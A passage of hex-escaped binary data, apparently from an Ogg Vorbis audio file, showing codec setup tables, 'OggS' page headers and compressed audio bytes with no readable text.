3C\x40\xF3\x3C\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1C\x4D\x03\x34\xD1\x03\x34\xCF\x03\x00\x00\x00\x00\x00\x00\x00\x4D\xF4\x00\x4F\x34\x01\x4F\x14\x01\x00\x00\x00\x00\x00\x00\xC0\xF2\x3C\xC0\x33\x3D\xC0\x13\x4D\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1C\x4D\x03\x34\xCF\x03\x34\xCF\x03\x00\x00\x00\x00\x00\x00\x00\xCB\xF3\x00\xCF\x14\x01\xCF\x33\x01\x00\x00\x00\x00\x00\x00\x40\xF3\x44\xC0\x13\x45\xC0\x33\x45\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x01\x0E\x00\x00\x01\x16\x42\xA1\x21\x2B\x02\x80\x38\x01\x00\x87\x24\x41\x92\x20\x49\xD0\x34\x80\x64\x59\xF0\x34\x68\x1A\x4C\x13\x20\x59\x16\x34\x0D\x9A\x06\xD3\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\xD2\x34\x68\x1A\x34\x0D\xA2\x08\x90\x34\x0D\x9A\x06\x4D\x83\x28\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x79\x1A\x34\x0D\x9A\x06\x51\x04\x48\x9A\x07\x4D\x83\xA6\x41\x14\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\xD0\x4C\x13\xA2\x08\x51\x84\x69\x02\x34\xD3\x84\x28\x42\x14\x61\x9A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x80\x01\x07\x00\x80\x00\x13\xCA\x40\xA1\x21\x2B\x02\x80\x38\x01\x00\x87\xE2\x58\x16\x00\x00\x38\x92\x63\x59\x00\x00\xE0\x38\x8E\x65\x01\x00\x80\x65\x59\x9A\x06\x00\x00\x96\x65\x69\x1A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x80\x01\x07\x00\x80\x00\x13\xCA\x40\xA1\x21\x2B\x01\x80\x28\x00\x00\x87\xA2\x58\x16\x70\x1C\xCB\x02\x8E\x63\x59\x40\x92\x2C\x0B\x60\x59\x00\xCD\x03\x68\x1A\x40\x14\x01\x80\x00\x00\x80\x02\x07\x00\x80\x00\x1B\x34\x25\x16\x07\x28\x34\x64\x25\x00\x10\x05\x00\xE0\x50\x14\xCB\xD2\x34\x51\xE4\x38\x9A\xA6\x69\xA2\xC8\x71\x34\x4D\xD3\x44\x91\x65\x69\x9A\xE7\x99\x26\x34\xCD\xF3\x4C\x13\x9E\xE7\x79\xA6\x09\xCF\xF3\x3C\xD3\x84\x69\x8A\xA2\xAA\x02\x51\x54\x55\x01\x00\x00\x05\x0E\x00\x00\x01\x36\x68\x4A\x2C\x0E\x50\x68\xC8\x4A\x00\x20\x24\x00\xC0\xE1\x38\x96\xE5\x79\x9E\x27\x8A\xA6\x68\x9A\xAA\xCA\x71\x34\xCD\xF3\x44\x51\x14\x4D\x53\x55\x55\x95\xE3\x58\x96\xE7\x89\xA2\x28\x9A\xA6\xAA\xBA\x2E\xCB\xD2\x34\xCF\x13\x45\x51\x34\x4D\x55\x75\x5D\x68\x9A\xE7\x89\xA2\x28\x9A\xA6\xAA\xBA\x2E\x3C\xCF\xF3\x44\xD1\x14\x4D\x55\x55\x5D\x17\x9E\xE7\x79\xA2\x68\x9A\xAA\xA9\xAA\xAE\x0B\x51\x14\x45\xD3\x34\x4D\x55\x55\x55\xD7\x05\xA2\x68\x9A\xA6\xA9\xAA\xAE\xEA\xBA\xC0\xF3\x44\xD1\x34\x55\xD5\x75\x5D\x17\x78\x9E\x28\x9A\xA6\xAA\xBA\xAE\xEB\x02\x51\x34\x4D\xD5\x54\x55\xD7\x75\x5D\x80\x69\x9A\xA6\xAA\xBA\xAE\xEC\x02\x54\x55\x55\x55\xD7\x75\x65\x17\xA0\xAA\xAA\xAA\xAA\xAE\x2B\xCB\x00\x55\x75\x5D\xD7\x75\x5D\x59\x06\xA0\xAA\xAE\xEB\xBA\xB2\x2C\x00\x00\xE0\xC0\x01\x00\x20\xC0\x08\x3A\xC9\xA8\xB2\x08\x1B\x4D\xB8\xF0\x00\x14\x1A\xB2\x22\x00\x88\x02\x00\x00\x8C\x51\x4A\x31\xA5\x0C\x63\x12\x42\x09\x21\x62\x4C\x42\x28\x21\x54\x52\x4A\x29\xA9\x94\x0A\x42\x29\xA5\x94\x50\x41\x28\xA1\xA4\x10\x32\x29\x29\xA5\x54\x4A\x05\xA1\x84\x50\x4A\xA8\x20\x94\x52\x4A\x29\x05\x00\x80\x1D\x38\x00\x80\x1D\x58\x08\x85\x86\xAC\x04\x00\xF2\x00\x00\x08\x63\x94\x62\xCC\x39\xE7\x24\x42\x4A\x31\xE6\x9C\x73\x12\x21\xA5\x18\x73\xCE\x39\xA9\x14\x63\xCE\x39\xE7\x9C\x94\x92\x31\xE7\x9C\x73\x4E\x4A\xC9\x98\x73\xCE\x39\x27\xA5\x64\xCC\x39\xE7\x9C\x93\x52\x3A\xE7\x9C\x73\xCE\x49\x29\xA5\x74\xCE\x39\xE7\xA4\x94\x52\x42\xE8\x9C\x83\x52\x4A\x29\x9D\x73\xCE\x39\x01\x00\x40\x05\x0E\x00\x00\x01\x36\x8A\x6C\x4E\x30\x12\x54\x68\xC8\x4A\x00\x20\x15\x00\xC0\xE0\x38\x96\xE5\x79\x9E\x27\x8A\xA6\x69\x49\x92\xA6\x79\x9E\x28\x9A\xA6\xAA\x6A\x92\xA4\x69\x9E\x27\x8A\xA6\xA9\xAA\x3C\xCF\xF3\x44\x51\x14\x4D\x53\x55\x79\x9E\xE7\x89\xA2\x28\x9A\xA6\xAA\x72\x5D\x51\x14\x45\xD3\x34\x4D\x55\xE5\xBA\xA2\x27\x8A\xA6\xA9\xAA\xAE\x0A\xD1\x14\x45\xD3\x54\x55\xD7\x85\x69\x8A\xA2\x69\xAA\xAA\xEB\x42\x96\x4D\xD3\x54\x5D\xD7\x75\x61\xDB\xA6\xA9\xAA\xAA\xEA\xBA\x40\x75\x55\xD5\x75\x5D\x19\xB8\xAE\xAA\xBA\xAE\x2C\x0B\x00\x00\x4F\x70\x00\x00\x2A\xB0\x61\x75\x84\x93\xA2\xB1\xC0\x42\x43\x56\x02\x00\x19\x00\x00\x84\x31\x08\x29\x84\x10\x52\x06\x21\xA4\x10\x42\x48\x29\x85\x90\x00\x00\x80\x01\x07\x00\x80\x00\x13\xCA\x40\xA1\x21\x2B\x01\x80\x54\x00\x00\x80\x10\x29\xA5\x94\x52\x4A\x29\x11\x63\x52\x4A\x29\xA5\x94\x52\x22\xE6\xA4\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\x21\x84\x50\x00\x20\x76\x85\x03\xC0\x4E\x84\x0D\xAB\x23\x9C\x14\x8D\x05\x16\x1A\xB2\x12\x00\x08\x07\x00\x00\x8C\x41\x8A\x31\x08\x29\xB5\xD6\x62\x85\x90\x62\xCE\x49\x49\x29\xC6\x18\x2B\x84\x18\x73\x8E\x4A\x4A\x2D\xB6\x18\x34\xE6\x1C\x84\x94\x5A\x6B\x31\xD7\xA0\x31\xE7\x20\xA4\xD2\x5A\x8C\x35\x06\xD5\x42\x28\xA5\xB5\x18\x6B\xAD\x35\xB8\x14\x3A\x2A\xA9\xC5\x18\x6B\xAD\x41\x08\x95\x52\x8A\x31\xC6\x1A\x73\x0D\x42\xA8\x92\x42\x6C\xB1\xE6\x9A\x6B\x10\xC2\xD6\xD4\x5A\xAC\xB5\xE7\x9C\x83\x10\x3A\xB7\x14\x53\x8C\x31\xF7\x1A\x84\x10\x42\xC6\x1A\x6B\xCD\xB9\xE7\x20\x84\x10\xB6\xD6\x56\x5B\xAF\xB9\x06\x21\x84\xF0\x41\xD6\x9A\x73\x0E\x3A\x08\x21\x84\x0F\xB2\xD6\x9A\x83\xCE\x05\x00\x98\x3C\x38\x00\x40\x25\xD8\x38\xC3\x4A\xD2\x59\xE1\x68\x70\xA1\x21\x2B\x01\x80\xDC\x00\x00\x04\x21\xA5\x18\x73\xCE\x39\x07\x21\x84\x10\x42\x08\x29\x42\x8C\x31\xE6\x9C\x73\x10\x42\x08\x21\x84\x52\x52\x84\x18\x63\xCC\x39\xE7\x20\x84\x10\x42\x08\x21\xA4\x8C\x31\xE6\x9C\x73\x10\x42\x08\xA1\x94\x52\x4A\x49\x29\x65\xCC\x39\xE7\x20\x84\x10\x42\x29\xA5\x94\x92\x52\xEA\x9C\x73\x10\x42\x08\xA1\x94\x52\x4A\x29\x25\xA5\xD4\x39\xE7\x20\x84\x10\x42\x09\xA5\x94\x52\x4A\x4A\xA9\x73\x0E\x42\x08\x21\x84\x52\x4A\x29\xA5\x94\x94\x52\x4A\x9D\x83\x10\x42\x28\xA5\x94\x52\x4A\x29\x29\xA5\x94\x42\x08\x21\x94\x52\x4A\x29\xA5\x94\x52\x52\x4A\x29\x85\x10\x42\x28\xA5\x94\x52\x4A\x29\xA5\xA4\x94\x52\x0A\x21\x84\x52\x4A\x29\xA5\x94\x52\x4A\x49\x29\xA5\x94\x52\x08\xA1\x94\x52\x4A\x29\xA5\x94\x92\x52\x4A\x29\xA5\x52\x4A\x29\xA5\x94\x52\x4A\x29\x25\xA5\x94\x52\x4A\xA5\x84\x52\x4A\x29\xA5\x94\x52\x4A\x4A\x29\xA5\x94\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x94\x52\x4A\x29\xA5\x54\x4A\x29\xA5\x94\x52\x4A\x29\x29\xA5\x94\x52\x4A\xA9\x94\x52\x4A\x29\xA5\x94\x52\x52\x4A\x29\xA5\x96\x52\x29\xA5\x94\x52\x4A\x29\xA5\xB4\xD4\x5A\x4A\x29\xA5\x52\x4A\x29\xA5\x94\x52\x4A\x49\x29\xA5\x94\x52\x4A\x29\x95\x52\x4A\x29\xA5\x94\x52\x00\x00\xD0\x81\x03\x00\x40\x80\x11\x95\x16\x62\xA7\x19\x57\x1E\x81\x23\x0A\x19\x26\xA0\x42\x43\x56\x02\x00\x64\x00\x00\x08\xA2\x14\x53\x4A\xAD\x45\x82\x2A\xC9\x9C\xC4\x5E\x42\x25\x15\x73\x90\x5A\x8A\x28\x93\x4E\x5A\x0E\xAE\x43\xD0\x20\xE6\xA4\x95\x8A\x39\x84\x94\x93\x54\x3A\x07\x95\x52\x0C\x4A\x2A\x21\x75\x4C\x29\x06\x29\x96\x1C\x42\xC6\x98\x93\x9C\x82\x4A\xA1\x63\x0E\x00\x00\x00\x41\x00\x00\x81\x90\x09\x04\x0A\xA0\xC0\x40\x06\x00\x1C\x20\x24\x48\x01\x00\x85\x05\x86\x0E\x11\x22\x40\x8C\x02\x03\xE3\xE2\xD2\x06\x00\x20\x08\x91\x19\x22\x11\xB1\x18\x24\x26\x54\x03\x45\xC5\x74\x00\xB0\xB8\xC0\x90\x0F\x00\x19\x1A\x1B\x69\x17\x17\xD0\x65\x80\x0B\xBA\xB8\xEB\x40\x08\x41\x08\x42\x10\x8B\x03\x28\x20\x01\x07\x27\xDC\xF0\xC4\x1B\x9E\x70\x83\x13\x74\x8A\x4A\x1D\x08\x00\x00\x00\x00\xC0\x03\x00\x3C\x00\x00\x24\x1B\x40\x44\x44\x34\x73\x1C\x1D\x1E\x1F\x20\x21\x22\x23\x24\x25\x4F\x67\x67\x53\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x55\x0B\x00\x00\x02\x00\x00\x00\xAE\x93\x37\x92\x01\x3C\x26\x27\x28\x02\x00\x00\x00\x00\x80\x07\x00\x1F\x00\x00\x49\x0A\x10\x11\x11\xCD\x1C\x47\x87\xC7\x07\x48\x88\xC8\x08\x49\x89\xC9\x09\x4A\x00\x00\x20\x80\x00\x00\x00\x00\x00\x08\x20\x00\x01\x01\x01\x00\x00\x00\x00\x80\x00\x00\x00\x00\x01\x01\x4F\x67\x67\x53\x00\x00\xC0\x2C\x00\x00\x00\x00\x00\x00\x55\x0B\x00\x00\x03\x00\x00\x00\xAB\x0F\x1C\x9B\x1D\x53\x4E\xFF\x3F\xFF\x26\xFF\x37\xFF\x63\xFF\x3F\xFF\x32\xFF\x4E\x49\x53\x57\x52\xFF\x6F\xFF\x47\xFF\x40\xFF\x53\xFF\xE4\x82\xB5\x62\xCE\xC7\xAC\x76\xA3\x78\x8A\xCD\x9B\xC9\x9B\x5A\x21\x6A\xF0\x3C\x5C\x71\x10\x72\x34\x7D\x95\xF8\xF6\xF3\x23\x00\x70\xB3\x75\xF3\x6E\xFF\x7F\x46\xFE\xAF\xE6\x92\xDB\xFC\xFE\x8B\xA3\x17\x0B\xD6\xBF\xBE\x9E\x8F\xBF\x7F\xC5\x2F\xDF\xB6\x88\xEF\xCE\x4D\xD4\x66\xF0\xD6\x2F\xA7\xD4\x39\xB3\x15\xC8\xEA\xF6\x87\xEA\x23\x00\xD4\x8A\x05\x36\x66\x92\xD4\x26\xE0\xAC\x98\x62\x63\x3F\x56\x35\xAB\x7B\xD9\xC7\x77\xD2\xCA\x35\x7D\xC1\x75\xF3\x47\x00\xB0\xF2\x72\xFD\x69\x59\x66\xF6\x57\xD5\x4E\x8C\xE3\xFC\xCB\x9B\x7F\x6D\x1F\xE1\x53\xFD\xEB\x3A\xBC\x7E\xEA\xD4\xEF\xCE\xE1\x3A\x42\x3A\xF7\x9B\x52\xE8\x33\x25\x89\xEA\x92\x9A\xAF\x3F\x29\x00\x5A\xCA\xB5\x41\x0A\xD9\x7F\x06\x28\x1B\x89\x82\xA1\x5A\x1B\xF8\xC0\x7F\x0E\x98\x48\xD6\xFD\x8A\xEC\x97\x3D\xDF\xB3\xBC\x70\x70\xF1\xCE\x1E\x39\x03\x00\x38\xF6\x71\xCC\x39\x46\x50\x65\x98\x9A\x0E\x00\x00\x00\x00\xC0\x5D\x7F\x85\x37\xE5\xD6\xB7\x4F\xF6\xD7\x9B\x68\x45\x00\x08\x9D\x79\xE6\x7D\xA7\xCD\xB8\x6B\x80\xD3\x18\x82\xB3\x08\x77\xF2\x6D\xDF\xF6\xF1\x3B\xD3\x1C\x90\xB2\x8E\x81\xEC\x30\xE1\x76\x57\x3F\xF2\x04\x73\x70\xDD\xA1\x7E\xEE\x2E\x62\xDC\xB7\x75\xF2\xDD\x13\x16\xD5\xA7\xB3\xF7\x59\xD0\x93\xDE\xCE\x7C\x70\xA3\x46\xFA\x66\x10\x1A\x51\xD9\x44\xC7\x09\x6C\x51\x45\xD7\xF3\xF1\xFB\x66\x56\x33\x7B\xB7\x52\xB1\xB4\x93\xC4\xD4\xB9\x26\xBB\x68\x37\x99\xEB\x69\x3E\x73\x99\x39\xD9\xCE\x7A\xDB\x2F\xDF\x47\x26\x4A\x2F\xCB\x0D\x33\x8A\x7C\x08\x97\x8C\xC7\x87\x51\x30\x0D\xA8\xFE\x01\x24\xBC\x5E\x57\x83\xE9\x36\x47\x12\x79\xC0\xD4\x74\xD6\x1F\xB5\xAF\x61\x37\xDA\x87\xA9\x6A\xF4\x34\x2F\x3E\xA4\xCC\xD1\xD2\x09\x11\x4C\xB2\x1B\x95\xD0\xEF\x50\x8D\x09\x51\xCC\x30\xEB\xA9\x7B\x27\xAB\x9A\x1B\x50\x36\xA3\xE9\x69\x55\x67\xF7\x61\x4F\xEF\x38\xEB\x9C\xE1\xF6\xF2\x9C\xAC\x12\xD5\x4C\xA2\x11\xD8\x0A\x6D\x64\xEF\x45\xD5\x47\x27\xFF\x17\xE3\x26\x36\xF1\xD5\xB4\xF2\x33\xB2\xDF\x0B\xC6\xAE\x89\x03\x2B\x20\x68\x19\x63\xDB\x5D\x5B\xD6\xF7\x87\x7A\x92\x05\xE1\xD3\x7F\xB6\x00\xDE\xBB\xA5\x32\x47\xA6\x7F\x8D\x8E\x76\x90\x28\xF4\xCB\xC5\xB2\xC5\xF9\xD7\x80\x1B\x89\xE2\xD6\x4D\x1A\x38\x0B\x28\xCC\xB9\xB5\x36\xAA\xAA\x94\x4E\x60\x00\x00\x00\x00\x80\xD7\x9D\xE3\xFB\x8F\xE3\xD3\xCD\x87\xF3\x41\xCD\xD2\xE7\x73\x73\x7C\x6B\x36\x18\x93\x83\x9B\xD6\xEE\xCB\x14\x37\x8F\x93\xDA\x21\x16\x83\xC6\x3A\xD2\xA5\x43\x2C\x46\xC6\xFC\x6F\xC4\xF2\x79\xCE\x20\x5D\x1E\x45\x2F\xDB\xF5\xE1\x86\x45\x27\x47\x9D\x78\xBF\xE2\x4B\xA3\xF9\x97\xDD\x62\x4E\x92\x9D\x93\xF3\xB3\xE5\x66\x7E\x77\x2A\x59\x66\x0D\xBA\xFC\x78\xCF\xF5\x64\x43\xDE\xBD\xAE\xC4\xAE\x12\xC2\xEB\x24\xD3\xDE\xEE\xDC\x77\xD6\x4B\x15\x45\xF7\x1C\x99\xBF\xB3\x43\x2A\xAE\xC7\xB8\xBD\x77\x55\xBF\x94\xE5\x72\xF3\x6B\x44\x64\xCF\x63\xE3\x24\xDB\x7F\xB9\x64\x51\x6A\x47\x72\x1B\xD7\x86\x5D\xDA\x4C\xB2\x9E\xFB\x21\x07\xCF\x74\x55\xEF\x5C\xA2\xD0\x61\xB1\x80\xD9\x67\x02\xA2\x9A\x47\x50\xEA\x49\xA6\x60\x4A\x37\xAF\xDD\x35\x55\xA3\xAC\x53\x44\xEC\xC1\xFD\x6A\x98\xE6\xE9\x69\x21\x12\x01\xA4\xCF\x14\x73\xAE\x06\x37\x02\xAE\xB7\x6A\xEA\x3E\xB0\x52\x32\xC6\x06\xD9\x7E\xA9\x99\x2F\xF8\xEB\x35\x76\x63\x7D\x8C\x94\x17\x6A\x7F\x94\x7E\x84\xD9\x23\x3D\xA6\xF8\xFB\xC9\xDB\xA4\xAF\x2C\x49\xE1\x3B\xA1\x10\x80\x02\x5E\x8B\x25\x69\x8D\xE0\xBF\x21\x21\x0C\x24\x0A\xDE\x5E\xA1\xCC\xC1\xFE\xE7\x80\x49\x39\x09\xFE\x22\x20\x2F\x97\xB5\xE3\xD8\xE7\xA8\x39\x2A\x28\x69\x3A\x74\x00\x00\x00\x00\x00\x64\x56\x6A\x55\xD5\x11\xB7\xB2\xBE\x75\x36\x26\xD6\x46\x9B\x7D\xD9\xFC\x6F\x5E\xD4\x7E\xD2\xC6\x4B\x72\x7A\xB0\xCE\x87\x3F\xBA\xF2\x81\xBF\xAC\x94\x9C\xD2\xFF\x90\xDE\x2F\x83\xFE\x3F\x3F\xCA\xCE\x07\x37\x29\x0B\x43\x5B\x25\xA6\xC3\x3D\xC7\xDE\x99\x4C\xEB\x69\xDB\x35\xE1\x9A\x5C\xEF\xF9\x8D\x9E\x6A\x22\x51\x4D\x77\xB4\x8A\xDC\x61\x21\x24\xDD\x55\x1E\xA2\x7D\x0C\x3F\xB1\xAF\x23\x96\x12\x49\x65\x27\xF5\x3C\x53\xF7\xCB\x6C\x71\xA2\xE2\x51\xFF\xE2\x55\x8D\xD1\xC3\x77\x1E\x35\xF7\x4B\x9B\xFF\x96\x30\x97\x77\x3E\xF7\xF8\xCC\x57\x34\xF3\xEE\x0C\xF3\x5E\x61\xED\xC3\xD3\x96\xE3\xD3\xAA\x98\x92\x72\xFE\x4F\x79\xE4\xCB\x21\x73\x6C\xCE\x50\xEF\x2F\xF2\x1C\x35\xFB\x55\x65\x1E\xBF\xB9\x84\x77\xE2\x24\x45\x29\xF4\x47\xC0\x5D\x49\xEF\x35\xAB\x87\x7E\xAE\x5F\xA6\x9F\x62\x3A\x1B\x38\x9D\x99\xCC\x0A\xD9\xDA\xF8\xFD\xAD\xC3\x9E\x4F\x5D\xA0\x93\x64\xEA\x9C\xCC\x97\xEA\x6E\xA6\x70\x0B\x8A\xFC\xEF\xFD\xCA\x58\x38\x40\x96\xBE\x5A\x8C\x26\x7E\xE9\xE1\x70\xA9\xEC\xCF\xE8\xD4\xBE\xAB\x48\xA6\xB0\xBE\x66\xF8\x4B\x7B\x79\x77\x2F\x5F\xA6\x98\x37\xE5\xF0\x0F\xBA\x2D\xAA\x02\x00\x3E\x7A\xB5\x14\x17\x21\xFE\x3B\x23\x12\xA6\xB2\x64\xDD\xD2\xAB\x05\x7C\xF0\xFF\x2C\x20\x21\xFF\xF2\xD3\xE8\xBD\x66\x62\x42\xDF\x32\x97\xA7\xF9\x71\xA7\x80\x91\xE9\x92\xD1\xC0\x19\x78\xCD\xE3\x02\x5E\xF7\x0B\x20\x40\xDB\xB6\x80\xA7\x1E\xFB\xF9\x04\x00\x00\x00\x00\x00\xF0\x49\xF3\x2A\xF5\xC9\xD8\xFB\x8B\xDD\xD1\xB8\xD9\x69\xD3\xD5\x7E\xAC\xE1\x25\x5E\xA9\xDF\xC8\x09\xF7\xFE\x31\x37\x45\x26\x34\xA7\x3D\xAF\x23\x7C\x13\x29\xBE\xAF\xA7\x08\xB9\x0D\xB8\x21\x94\x74\x97\x50\x47\xDB\x57\xA5\xAE\xA7\xD0\x11\x72\x3B\x4F\x2F\x1D\xF7\x2F\x97\xA5\x0B\x21\x77\x81\xBC\xB7\x57\xD3\xFD\x46\x43\xAF\x15\xD4\x94\x46\x1D\xF7\x99\x65\x66\xC6\xCD\xD3\xD7\x8F\x70\xD8\x59\xCF\x9C\xFC\xAF\x3E\x8F\x7A\x9C\x6C\xD5\x84\x5D\x92\xFC\x22\x7E\x32\xE7\x9A\xFB\x5D\xBE\xC6\x48\xED\x3F\x0D\x1A\x66\xAA\x4A\xCA\xFC\xE7\xA5\xCE\x17\x41\xC4\x59\xD5\xD4\x1D\xD9\x66\x7C\x76\xD5\x21\x89\x64\xEB\xC2\xDB\x0F\x88\xAE\xB9\xCE\x37\x1F\x96\xE6\x19\xD7\x32\xCF\xDE\x4F\xF7\xC9\x3D\x97\xBA\x3C\x5E\x3A\x59\x34\x6E\x56\x57\x0F\x53\x74\xA2\x9B\x19\x5A\x5E\xF8\x06\x8F\xEE\x08\x27\x96\xE8\x6B\x5A\xD5\x3D\x41\x05\x9D\x08\x01\x9A\xEA\xA9\xAB\xEA\xF8\x8A\x7B\x38\xD8\x5D\xA8\xC7\x75\x9B\x49\x0F\x54\xC4\xAE\xDF\x3E\xF2\x79\xA3\xD9\xD8\x93\xED\x52\x81\x9B\x32\x99\x3E\x8A\xEF\x7E\x24\xF4\x64\x83\x11\x00\x0A\x6A\xA2\xA2\xCF\xA8\x28\xAA\x00\xAA\xC8\xA3\x82\x88\x29\xAA\x8A\x20\x28\x22\x3F\x2F\x72\x20\x49\x92\x2C\xAC\xBF\x58\x7F\xD7\xAD\xE1\xB7\x15\x48\xC2\x00\x5E\x8B\x85\xC0\x05\xFE\x1B\x26\x6C\x24\xC1\xEF\x6E\x01\x4E\x19\xE6\xBF\x82\x92\x06\x92\xE0\xD7\x59\x92\xB8\x10\xB0\xCF\x63\xCC\xA5\xAA\x2A\x1C\x0E\x1F\x00\x00\x00\x00\x00\xEC\xCF\xEA\xA3\x9D\x1E\x85\xC4\xA8\xD9\x4E\xB9\x55\x99\x58\xA9\xBE\xAB\x76\x98\x79\xF5\xA6\x1A\x32\x19\x57\xD9\xD6\x57\xCB\xED\x53\x2E\x3E\x4D\xF7\x0A\x73\xAE\x91\xD7\x37\x1B\x28\xE9\xC4\xA7\x56\xFB\x31\x89\x2C\xBA\xBE\xF3\x5B\xCE\x96\x58\xB8\x2E\x2D\x5D\xE4\xDD\xB0\x38\xDE\x7C\x03\xF0\x5A\x8F\xEA\xF3\xD3\xE9\x2C\x5C\x0E\x78\x9C\xED\xBC\x7F\xE2\x9B\x58\x45\xEA\x3C\xA7\xEA\xE1\xF2\x4D\x1F\xE8\xC7\x92\x5B\xDB\xE1\xE3\xA9\xF3\xD6\x90\x4C\x7C\x73\x90\x9F\xEE\x54\x70\xDB\xBB\x4C\x2E\xCC\xF3\xAF\x75\xAF\xEA\xB6\xC9\xCC\xAA\xAC\x5A\x1E\xFF\x9F\x9D\xA9\x38\x24\xDE\x56\x9D\x49\xD7\x9D\xA2\x1A\xD5\x30\xBE\xFF\x12\x3F\x58\xBE\xEF\x9F\xAB\x59\x94\x11\x10\x4C\xAD\xB1\xF3\x5A\x88\x4B\xC4\xED\x06\x6A\x1C\xE7\x12\x06\xB5\xC2\x34\x2C\x5E\xCF\x4C\xE5\x66\x3E\x64\x26\xE5\x94\x28\x6C\xA7\x66\x9D\x9A\x31\x8C\x60\xCF\x79\x89\xFB\x8B\x6C\xA8\x6E\x31\x2D\x2F\x94\xA7\x33\x27\x9B\x21\x6D\xAE\x33\xF9\xEC\xEB\xD8\x08\x21\x21\x7C